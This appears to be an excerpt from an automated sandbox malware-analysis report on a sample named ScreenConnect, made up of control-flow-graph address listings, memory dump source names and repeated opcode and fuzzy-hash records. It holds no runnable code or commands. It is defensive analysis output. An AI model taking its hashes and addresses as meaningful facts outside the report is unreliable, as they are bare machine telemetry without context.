                                                                                                                          control_flow_graph 953 7ffd9bbb6c7c-7ffd9bbb6c8c 955 7ffd9bbb6cd6-7ffd9bbb6ce6 953->955 956 7ffd9bbb6c8e-7ffd9bbb6caa 953->956 962 7ffd9bbb6ce8-7ffd9bbb6cea 955->962 963 7ffd9bbb6cec-7ffd9bbb6cfa 955->963 957 7ffd9bbb70b8-7ffd9bbb70d6 call 7ffd9bbb0a20 * 2 956->957 958 7ffd9bbb6cb0-7ffd9bbb6cce call 7ffd9bbb0a20 * 2 956->958 975 7ffd9bbb70dc-7ffd9bbb70e3 957->975 976 7ffd9bbb71e2-7ffd9bbb71ed 957->976 972 7ffd9bbb6f4e-7ffd9bbb6f6c call 7ffd9bbb0a20 * 2 958->972 973 7ffd9bbb6cd4-7ffd9bbb6cd5 958->973 966 7ffd9bbb6cfd-7ffd9bbb6d12 962->966 963->966 978 7ffd9bbb6d18-7ffd9bbb6d3c call 7ffd9bbb6900 * 2 966->978 979 7ffd9bbb6d14-7ffd9bbb6d16 966->979 995 7ffd9bbb6f96-7ffd9bbb6fb4 call 7ffd9bbb0a20 * 2 972->995 996 7ffd9bbb6f6e-7ffd9bbb6f78 972->996 973->955 980 7ffd9bbb70e5-7ffd9bbb70f4 975->980 981 7ffd9bbb70f6-7ffd9bbb70f8 975->981 984 7ffd9bbb6d3f-7ffd9bbb6d54 978->984 979->984 980->981 990 7ffd9bbb70fa 980->990 983 7ffd9bbb70ff-7ffd9bbb7123 981->983 999 7ffd9bbb7125-7ffd9bbb7142 983->999 1000 7ffd9bbb716f-7ffd9bbb7185 983->1000 997 7ffd9bbb6d56-7ffd9bbb6d58 984->997 998 7ffd9bbb6d5a-7ffd9bbb6d7e call 7ffd9bbb6900 * 2 984->998 990->983 1027 7ffd9bbb706b-7ffd9bbb7076 995->1027 1028 7ffd9bbb6fba-7ffd9bbb6fc5 995->1028 1001 7ffd9bbb6f8c 996->1001 1002 7ffd9bbb6f7a-7ffd9bbb6f8a 996->1002 1003 7ffd9bbb6d81-7ffd9bbb6d96 997->1003 998->1003 1010 7ffd9bbb7148-7ffd9bbb716d 999->1010 1011 7ffd9bbb71ee-7ffd9bbb7267 999->1011 1000->976 1008 7ffd9bbb6f8e-7ffd9bbb6f8f 1001->1008 1002->1008 1020 7ffd9bbb6d98-7ffd9bbb6d9a 1003->1020 1021 7ffd9bbb6d9c-7ffd9bbb6db4 call 7ffd9bbb6900 1003->1021 1008->995 1010->1000 1034 7ffd9bbb7269-7ffd9bbb72ad 1011->1034 1035 7ffd9bbb72b0-7ffd9bbb72da 1011->1035 1026 7ffd9bbb6dc3-7ffd9bbb6dd1 1020->1026 1021->1026 1037 7ffd9bbb6dd7-7ffd9bbb6de5 1026->1037 1038 7ffd9bbb6dd3-7ffd9bbb6dd5 1026->1038 1039 7ffd9bbb7078-7ffd9bbb707a 1027->1039 1040 7ffd9bbb707c-7ffd9bbb708b 1027->1040 1041 7ffd9bbb6fc7-7ffd9bbb6fc9 1028->1041 1042 7ffd9bbb6fcb-7ffd9bbb6fda 1028->1042 1073 7ffd9bbb72ae 1034->1073 1043 7ffd9bbb6de8-7ffd9bbb6df1 1037->1043 1038->1043 1044 7ffd9bbb708e-7ffd9bbb7090 1039->1044 1040->1044 1045 7ffd9bbb6fdd-7ffd9bbb7018 1041->1045 1042->1045 1062 7ffd9bbb6df8-7ffd9bbb6dff 1043->1062 1044->976 1048 7ffd9bbb7096-7ffd9bbb70a8 1044->1048 1057 7ffd9bbb701b-7ffd9bbb7021 1045->1057 1058 7ffd9bbb7023-7ffd9bbb702b 1057->1058 1059 7ffd9bbb7034-7ffd9bbb703c 1057->1059 1063 7ffd9bbb703d-7ffd9bbb703e 1058->1063 1065 7ffd9bbb702d-7ffd9bbb7032 1058->1065 1059->1063 1064 7ffd9bbb704e 1059->1064 1062->972 1067 7ffd9bbb6e05-7ffd9bbb6e0c 1062->1067 1068 7ffd9bbb7043-7ffd9bbb704d call 7ffd9bbb6938 1063->1068 1069 7ffd9bbb7054-7ffd9bbb7069 1064->1069 1065->1068 1067->972 1070 7ffd9bbb6e12-7ffd9bbb6e29 1067->1070 1068->1069 1069->1027 1069->1057 1076 7ffd9bbb6e2b-7ffd9bbb6e3d 1070->1076 1077 7ffd9bbb6e5e-7ffd9bbb6e69 1070->1077 1073->1073 1082 7ffd9bbb6e3f-7ffd9bbb6e41 1076->1082 1083 7ffd9bbb6e43-7ffd9bbb6e51 1076->1083 1080 7ffd9bbb6e6b-7ffd9bbb6e6d 1077->1080 1081 7ffd9bbb6e6f-7ffd9bbb6e7e 1077->1081 1084 7ffd9bbb6e81-7ffd9bbb6e83 1080->1084 1081->1084 1085 7ffd9bbb6e54-7ffd9bbb6e57 1082->1085 1083->1085 1087 7ffd9bbb6f38-7ffd9bbb6f4a 1084->1087 1088 7ffd9bbb6e89-7ffd9bbb6ea0 1084->1088 1085->1077 1087->972 1088->1087 1092 7ffd9bbb6ea6-7ffd9bbb6ec3 1088->1092 1095 7ffd9bbb6ec5-7ffd9bbb6ecd 1092->1095 1096 7ffd9bbb6ecf 1092->1096 1097 7ffd9bbb6ed1-7ffd9bbb6ed3 1095->1097 1096->1097 1097->1087 1099 7ffd9bbb6ed5-7ffd9bbb6edf 1097->1099 1100 7ffd9bbb6eed-7ffd9bbb6ef5 1099->1100 1101 7ffd9bbb6ee1-7ffd9bbb6eeb call 7ffd9bbb1580 1099->1101 1103 7ffd9bbb6ef7-7ffd9bbb6f1c call 7ffd9bbb51e8 1100->1103 1104 7ffd9bbb6f23-7ffd9bbb6f36 call 7ffd9bbb6928 1100->1104 1101->972 1101->1100 1103->1104 1104->972
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000C.00000002.2953376145.00007FFD9BBB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBB0000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_12_2_7ffd9bbb0000_ScreenConnect.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 43cb0633917ad66f876aa5436a5939a86f0d97668d3b4023eaa3a8e98f045468
                                                                                                                          • Instruction ID: 536872e151c09d134f0c86c6f112012b7873cc76483688b7a2f9f57d4a2341ec
                                                                                                                          • Opcode Fuzzy Hash: 43cb0633917ad66f876aa5436a5939a86f0d97668d3b4023eaa3a8e98f045468
                                                                                                                          • Instruction Fuzzy Hash: CA02C831B1ED2E4EEB7997A884746BA62D2FF98344F564079D04EC31E2DD28BE468740

                                                                                                                          Control-flow Graph

                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000C.00000002.2946153340.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_12_2_7ffd9b8a0000_ScreenConnect.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: MitigationPolicyProcess
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1088084561-0
                                                                                                                          • Opcode ID: 0b4a46091e9b7618eef3628c820fa4da3498744ba7d7a9cb9c3f3f101fd43bb3
                                                                                                                          • Instruction ID: 2dc8b946b8dad94ab7a8d05c4d8fdee3b884bceb4378d4b60edbc0b42b4fa931
                                                                                                                          • Opcode Fuzzy Hash: 0b4a46091e9b7618eef3628c820fa4da3498744ba7d7a9cb9c3f3f101fd43bb3
                                                                                                                          • Instruction Fuzzy Hash: F241293190DB584FDB28AFA8984A5E97BE0EF59310F04417FE449C3192DF78A9468BA1

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 681 7ffd9bbb01f5-7ffd9bbb01fd 682 7ffd9bbb01ff 681->682 683 7ffd9bbb0200-7ffd9bbb020d 681->683 682->683 684 7ffd9bbb020f 683->684 685 7ffd9bbb0210-7ffd9bbb0227 683->685 684->685 686 7ffd9bbb0229-7ffd9bbb022f 685->686 687 7ffd9bbb0230-7ffd9bbb0239 685->687 688 7ffd9bbb023b-7ffd9bbb023c 687->688 689 7ffd9bbb0243-7ffd9bbb027e 687->689 688->689 692 7ffd9bbb02c8-7ffd9bbb02f0 689->692 693 7ffd9bbb0280-7ffd9bbb02c7 689->693 698 7ffd9bbb0314-7ffd9bbb032c 692->698 699 7ffd9bbb02f2-7ffd9bbb0311 692->699 693->692 702 7ffd9bbb0350-7ffd9bbb036e 698->702 703 7ffd9bbb032e-7ffd9bbb034d 698->703 699->698 708 7ffd9bbb038a-7ffd9bbb0395 702->708 709 7ffd9bbb0370-7ffd9bbb0388 702->709 703->702 713 7ffd9bbb039b-7ffd9bbb03a4 708->713 714 7ffd9bbb042e-7ffd9bbb0462 708->714 709->708 716 7ffd9bbb03a6-7ffd9bbb03b3 713->716 717 7ffd9bbb03bd-7ffd9bbb03c8 713->717 733 7ffd9bbb04de-7ffd9bbb04ea 714->733 734 7ffd9bbb0464 714->734 716->717 724 7ffd9bbb03b5-7ffd9bbb03bb 716->724 718 7ffd9bbb03ca-7ffd9bbb03e7 717->718 719 7ffd9bbb0414-7ffd9bbb0420 717->719 725 7ffd9bbb03ed-7ffd9bbb0412 718->725 726 7ffd9bbb06d2-7ffd9bbb071a 718->726 719->714 724->717 725->719 740 7ffd9bbb071b-7ffd9bbb072f 726->740 736 7ffd9bbb04ec-7ffd9bbb04ee 733->736 737 7ffd9bbb04f0-7ffd9bbb04f1 733->737 738 7ffd9bbb0466-7ffd9bbb046a 734->738 739 7ffd9bbb04aa-7ffd9bbb04b6 734->739 741 7ffd9bbb0501-7ffd9bbb051e 736->741 742 7ffd9bbb04f2-7ffd9bbb04f4 737->742 744 7ffd9bbb04db-7ffd9bbb04dc 738->744 745 7ffd9bbb046c-7ffd9bbb0471 738->745 746 7ffd9bbb04b8-7ffd9bbb04ba 739->746 747 7ffd9bbb04bc-7ffd9bbb04ca 739->747 756 7ffd9bbb073b-7ffd9bbb0742 740->756 757 7ffd9bbb0731-7ffd9bbb073a 740->757 761 7ffd9bbb0520-7ffd9bbb0522 741->761 762 7ffd9bbb0524-7ffd9bbb0532 741->762 749 7ffd9bbb04f6-7ffd9bbb04ff 742->749 744->733 745->742 750 7ffd9bbb0473-7ffd9bbb047e 745->750 748 7ffd9bbb04cd-7ffd9bbb04ea 746->748 747->748 748->736 748->737 749->741 754 7ffd9bbb04ef 750->754 755 7ffd9bbb0480-7ffd9bbb048f 750->755 754->737 755->749 767 7ffd9bbb0491-7ffd9bbb0496 755->767 758 7ffd9bbb074e-7ffd9bbb078c 756->758 759 7ffd9bbb0744-7ffd9bbb074d 756->759 758->740 780 7ffd9bbb078f-7ffd9bbb079b 758->780 766 7ffd9bbb0535-7ffd9bbb0552 761->766 762->766 775 7ffd9bbb0558-7ffd9bbb0566 766->775 776 7ffd9bbb0554-7ffd9bbb0556 766->776 769 7ffd9bbb04a0-7ffd9bbb04a6 767->769 772 7ffd9bbb04ac-7ffd9bbb04b6 769->772 773 7ffd9bbb05f0-7ffd9bbb060e 769->773 772->746 772->747 787 7ffd9bbb06ad-7ffd9bbb06cf 773->787 788 7ffd9bbb0614-7ffd9bbb061e 773->788 777 7ffd9bbb0569-7ffd9bbb057f 775->777 776->777 784 7ffd9bbb0596-7ffd9bbb059d 777->784 785 7ffd9bbb0581-7ffd9bbb0594 777->785 793 7ffd9bbb05a4-7ffd9bbb05b7 784->793 785->784 794 7ffd9bbb05bd-7ffd9bbb05c0 785->794 791 7ffd9bbb0620-7ffd9bbb0622 788->791 792 7ffd9bbb0624-7ffd9bbb0632 788->792 795 7ffd9bbb0635-7ffd9bbb0652 791->795 792->795 793->794 797 7ffd9bbb05d7-7ffd9bbb05ea 794->797 798 7ffd9bbb05c2-7ffd9bbb05d5 794->798 800 7ffd9bbb0658-7ffd9bbb0666 795->800 801 7ffd9bbb0654-7ffd9bbb0656 795->801 797->773 798->773 798->797 803 7ffd9bbb0669-7ffd9bbb0686 800->803 801->803 806 7ffd9bbb0688-7ffd9bbb068a 803->806 807 7ffd9bbb068c-7ffd9bbb069a 803->807 808 7ffd9bbb069d-7ffd9bbb06a6 806->808 807->808 808->787
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000C.00000002.2953376145.00007FFD9BBB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBB0000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_12_2_7ffd9bbb0000_ScreenConnect.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 1f85eb699b4301354111ebd5aea5fd66259cab3a2e852d71a02fc40ca99b26ac
                                                                                                                          • Instruction ID: d245b01384c879be1eb36db7dfdea82b8cfc175b82a9e6e8776bd112585ef58d
                                                                                                                          • Opcode Fuzzy Hash: 1f85eb699b4301354111ebd5aea5fd66259cab3a2e852d71a02fc40ca99b26ac
                                                                                                                          • Instruction Fuzzy Hash: 73125871B0EA5E0FE7A9E7AD84656B637D1FF58304F4540BAE44DC72E2ED28E9028700
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000C.00000002.2953376145.00007FFD9BBB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBB0000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_12_2_7ffd9bbb0000_ScreenConnect.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 75aa3850d9ff3cdcfea678e6a26c11fe5076a0f2fdf2ccd1e608b3781bdc0edb
                                                                                                                          • Instruction ID: 68a4522ba0a15ec6137286fd315b9102ea83617046a78eeb2dc78d121f290795
                                                                                                                          • Opcode Fuzzy Hash: 75aa3850d9ff3cdcfea678e6a26c11fe5076a0f2fdf2ccd1e608b3781bdc0edb
                                                                                                                          • Instruction Fuzzy Hash: 17B18C21B0EA5B4FEB6A976858B05B97781FF45308B0901BAD09DC71EBDD18EC068742
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000C.00000002.2953376145.00007FFD9BBB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBB0000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_12_2_7ffd9bbb0000_ScreenConnect.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 4b309ba2c44cc2ba4fe0595abe0b37cc933f1f6b8581780011d485f3739fbdc6
                                                                                                                          • Instruction ID: 00bc0e7a6f1c962f3a69beaedfc65df0dc7e42fab4f56453e216b5e42ea7302a
                                                                                                                          • Opcode Fuzzy Hash: 4b309ba2c44cc2ba4fe0595abe0b37cc933f1f6b8581780011d485f3739fbdc6
                                                                                                                          • Instruction Fuzzy Hash: 33A1147270DA4A4FEBA8EE58D8659AA37D2FF94354B0401B9D44DC71E3DE25F802CB40
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000C.00000002.2953376145.00007FFD9BBB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBB0000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_12_2_7ffd9bbb0000_ScreenConnect.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: fa7c06b20af456c763813ced300183db3fbd28d420e585ead68595d74d72c441
                                                                                                                          • Instruction ID: ca2a2ee5a389c415fc3e613fdb6e480b14fcaa1ce19aa731197021acc7108562
                                                                                                                          • Opcode Fuzzy Hash: fa7c06b20af456c763813ced300183db3fbd28d420e585ead68595d74d72c441
                                                                                                                          • Instruction Fuzzy Hash: 4E91F932A1DA1E4BEF6CEA14C4A28B673D1FF64344B41053DD44A875E2EE35FA46CB81
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000C.00000002.2953376145.00007FFD9BBB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBB0000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_12_2_7ffd9bbb0000_ScreenConnect.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 4d2d04ec112546f5c37e7d0655f3cbb1b5eb34d9445a786e7944f157f5c4e737
                                                                                                                          • Instruction ID: fb3128b60ed48b0dfb3d50c71b6241d181d9f01e86e15ff0eca078b7d2ec2948
                                                                                                                          • Opcode Fuzzy Hash: 4d2d04ec112546f5c37e7d0655f3cbb1b5eb34d9445a786e7944f157f5c4e737
                                                                                                                          • Instruction Fuzzy Hash: B091743470DA4A8FCBDDEF58C4A0AA177E2FF9930472445B9C059CB69BDA25E843CB40
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000C.00000002.2953376145.00007FFD9BBB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBB0000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_12_2_7ffd9bbb0000_ScreenConnect.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 8a571200a5606ee22dc65909fd9c2685c1961031b80f771630c8ec9d29a9b7d6
                                                                                                                          • Instruction ID: 44d6779c5021989f05210a03d40494701ec6dd7b6d52ffc9d82bb36dbf11bbd9
                                                                                                                          • Opcode Fuzzy Hash: 8a571200a5606ee22dc65909fd9c2685c1961031b80f771630c8ec9d29a9b7d6
                                                                                                                          • Instruction Fuzzy Hash: 9A71FE70719A1E8FEBB8EB59C4A1BB632D1FF58305F954078E44EC72E2DD64E9058B40
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000C.00000002.2953376145.00007FFD9BBB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBB0000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_12_2_7ffd9bbb0000_ScreenConnect.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: b746f7be9c290dd2326a9569ae38113817dcb9bbc88e15455138ae6bceb22721
                                                                                                                          • Instruction ID: 507078c3adc69296a7464ea59af933c36301286c840e98b20424154fead27757
                                                                                                                          • Opcode Fuzzy Hash: b746f7be9c290dd2326a9569ae38113817dcb9bbc88e15455138ae6bceb22721
                                                                                                                          • Instruction Fuzzy Hash: 13715831F1A92F4AEB7597A584716FA62D2FF98348F564439D01EC21E2DD28FA428B40
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000C.00000002.2953376145.00007FFD9BBB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBB0000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_12_2_7ffd9bbb0000_ScreenConnect.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 994aed78f35b8c0e16bbd207106bbce5e68875dcdc41a4454b3ab62c5d0d5447
                                                                                                                          • Instruction ID: c1e1a4d91f09bd337db98094ae2a313f2389c3862939abedb58c1e1588b4069f
                                                                                                                          • Opcode Fuzzy Hash: 994aed78f35b8c0e16bbd207106bbce5e68875dcdc41a4454b3ab62c5d0d5447
                                                                                                                          • Instruction Fuzzy Hash: 3651C553D0F6EA0FE7629A7C58754E67F60EF1366870A01F7C0988F0F3E95929468B41
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000C.00000002.2953376145.00007FFD9BBB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBB0000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_12_2_7ffd9bbb0000_ScreenConnect.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 556d4f077e00a0afa6a24fd9384d92c5097489c29cb4605a4a671dec0113d904
                                                                                                                          • Instruction ID: 262accac9d4700abe6bcb0a9303bca4b7097a9c0971074cd588d5cff413c28e0
                                                                                                                          • Opcode Fuzzy Hash: 556d4f077e00a0afa6a24fd9384d92c5097489c29cb4605a4a671dec0113d904
                                                                                                                          • Instruction Fuzzy Hash: 8C41C36390F6EA0FE7629A7C58754E67F60EF1326870A01F7C0D48F0E3E9192946CB91
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000C.00000002.2953376145.00007FFD9BBB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBB0000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_12_2_7ffd9bbb0000_ScreenConnect.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 5ae1587486d653dffca0c95df1cf8d74ad371b78bbdffd690c4e9814e7434856
                                                                                                                          • Instruction ID: b78f7ad5b664edbebe360f6a286c607bc27214b12ff5000d917b31ff0f9389a3
                                                                                                                          • Opcode Fuzzy Hash: 5ae1587486d653dffca0c95df1cf8d74ad371b78bbdffd690c4e9814e7434856
                                                                                                                          • Instruction Fuzzy Hash: 56315612B0FAAA0FE7B29A7C14A02767B91FF9575570A01FFC088C71E7ED14990A8741
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000C.00000002.2953376145.00007FFD9BBB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBB0000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_12_2_7ffd9bbb0000_ScreenConnect.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: e050a78586b83a52b48bc2039417349f99b8de06c48dc64266c2cf6d5dfd02da
                                                                                                                          • Instruction ID: 397be40d590705730181460e96df1a0eb77d49b02702d441037b1a4c2a1a6384
                                                                                                                          • Opcode Fuzzy Hash: e050a78586b83a52b48bc2039417349f99b8de06c48dc64266c2cf6d5dfd02da
                                                                                                                          • Instruction Fuzzy Hash: 27319922B0EE9F0BEBA9ABB998715B67791FF14344B1100BED04DC30D3ED19AD068742
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000C.00000002.2953376145.00007FFD9BBB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBB0000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_12_2_7ffd9bbb0000_ScreenConnect.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 5d27d580664dc04ba6d29133e41e0097433886c2f23b9877d89a2ed3d775b056
                                                                                                                          • Instruction ID: d98d2f1acb0eec33b17ad702f71e1a749b58c414dc2448395ce1def950004578
                                                                                                                          • Opcode Fuzzy Hash: 5d27d580664dc04ba6d29133e41e0097433886c2f23b9877d89a2ed3d775b056
                                                                                                                          • Instruction Fuzzy Hash: 28315612F1EAAA0FE764A76C58656797BD1FF86314B1A41FDC098C30E6ED1868468342
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000C.00000002.2953376145.00007FFD9BBB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBB0000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_12_2_7ffd9bbb0000_ScreenConnect.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: c622e6eba6e80a2a109f92c732dbddc167ec27efeb246968006ea4f930b6833d
                                                                                                                          • Instruction ID: 5bc2856be3fc66f728948b791af0dfb64aa75bc7e39beb1239a88cb78d72fa83
                                                                                                                          • Opcode Fuzzy Hash: c622e6eba6e80a2a109f92c732dbddc167ec27efeb246968006ea4f930b6833d
                                                                                                                          • Instruction Fuzzy Hash: D8310936B0ED5D8EEB64AA949C700DA77A1FF99308F050679E44CC31F2DB256902CB41
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000C.00000002.2953376145.00007FFD9BBB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBB0000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_12_2_7ffd9bbb0000_ScreenConnect.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 55188d4c2a2dc2c97b5dacafe26075e180ab8c4c4394fcf99fcec60a9e1f2757
                                                                                                                          • Instruction ID: fb8e1ea141298e36d6b3c7c3ebb85dc746407f5446e15810f157804b898856f8
                                                                                                                          • Opcode Fuzzy Hash: 55188d4c2a2dc2c97b5dacafe26075e180ab8c4c4394fcf99fcec60a9e1f2757
                                                                                                                          • Instruction Fuzzy Hash: 8921E533F0ED6D4AEBA596A85C311EA3791FF44348F0505BFE55ED31E1DE25EA008A81
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000C.00000002.2953376145.00007FFD9BBB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBB0000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_12_2_7ffd9bbb0000_ScreenConnect.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 76ba678715ac71c0551cf24ecf55a575f1b3b45c6c9bf9a8a6f4bba8aa407faf
                                                                                                                          • Instruction ID: 0c2df11f349478d10b54009414af8e65d929550def7375dfb426422e68bcf6da
                                                                                                                          • Opcode Fuzzy Hash: 76ba678715ac71c0551cf24ecf55a575f1b3b45c6c9bf9a8a6f4bba8aa407faf
                                                                                                                          • Instruction Fuzzy Hash: D4210631A0DE9D4FDBA8EB6888656BA77F1FF65304F4501ABE04DC31E2DE25A8068741
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000C.00000002.2953376145.00007FFD9BBB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBB0000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_12_2_7ffd9bbb0000_ScreenConnect.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 672959fb4c4b16331dfe8d0da71f951c2df3ac8b1924d714533f57a024c8c6a8
                                                                                                                          • Instruction ID: d8250f335e728015e19dd62b7d7d8105a5c1e319a30dbc4d918214a11ea4db72
                                                                                                                          • Opcode Fuzzy Hash: 672959fb4c4b16331dfe8d0da71f951c2df3ac8b1924d714533f57a024c8c6a8
                                                                                                                          • Instruction Fuzzy Hash: 45210862A0F66A5FD752AA6CA4B14E67B60EF1221870901B3D098CB0F3ED156946CB80
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000C.00000002.2953376145.00007FFD9BBB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBB0000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_12_2_7ffd9bbb0000_ScreenConnect.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 0f5a4016b1f18f95345b22cd2153185efb8f3a579626864a5c7626e67512c1b4
                                                                                                                          • Instruction ID: cad8e712a3cd32b978198f5a98f1fa06e9507bb355bc53b70eb9def8ec8780e0
                                                                                                                          • Opcode Fuzzy Hash: 0f5a4016b1f18f95345b22cd2153185efb8f3a579626864a5c7626e67512c1b4
                                                                                                                          • Instruction Fuzzy Hash: A211A872E0EA5C4FDF958F545CB21A93FA1FF55304F0505AAD15CD32F6DA256901CB02
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000C.00000002.2953376145.00007FFD9BBB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBB0000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_12_2_7ffd9bbb0000_ScreenConnect.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: f3db1229a12485c2e7ef11ebcde7ab6fbb50f88baef3d67ec71684f260ea291e
                                                                                                                          • Instruction ID: c8b3d1cae49b7de6594337c0f667eb037532b8dcdb2165345accbee0a96dac53
                                                                                                                          • Opcode Fuzzy Hash: f3db1229a12485c2e7ef11ebcde7ab6fbb50f88baef3d67ec71684f260ea291e
